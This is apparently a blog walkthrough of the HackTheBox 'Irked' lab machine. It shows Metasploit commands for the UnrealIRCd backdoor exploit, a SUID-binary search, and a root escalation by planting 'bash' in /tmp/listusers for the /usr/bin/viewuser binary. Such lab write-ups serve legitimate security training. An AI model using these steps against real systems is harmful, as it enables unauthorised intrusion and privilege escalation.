HacktheBox Irked: Walkthrough

HacktheBox Teacher Walkthrough
April 20, 2019
Prtg Network Monitor Exploit With POC
May 3, 2019
Share This:

HacktheBox Irked: Walkthrough

Let’s start off with scanning the network to find our target.

Scanning

Now here we have bunch of ports open lets go on webserver

IRC is almost working! (Seems Interesting)

Searching For Exploit

Search for irc exploit (metasploit)

As per our nmap scan this is perfect exploit

Exploiting

Lets use it

  • msfconsole
  • use exploit/unix/irc/unreal_ircd_3281_backdoor
  • show option
  • set RHoSTS 10.10.10.117

now we need find the perfect port to exploit

I tried every single port to exploit and 65534 works for me

Now we have shell but we are not root

Privilege Escalation

After Spending Some Time on box i noticed this

Command – find / -perm -u=s -type f 2>/dev/null

Here /usr/bin/viewuser is very interesting. Lets Run

Error — tmp/listusers not found

So lets make it

echo bash > /tmp/listusers

now giving full permission

chmod 777 /tmp/listusers

Final Step Running /usr/bin/viewuser again

/usr/bin/viewuser

We are root now

Happy Hacking…

Share This:

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: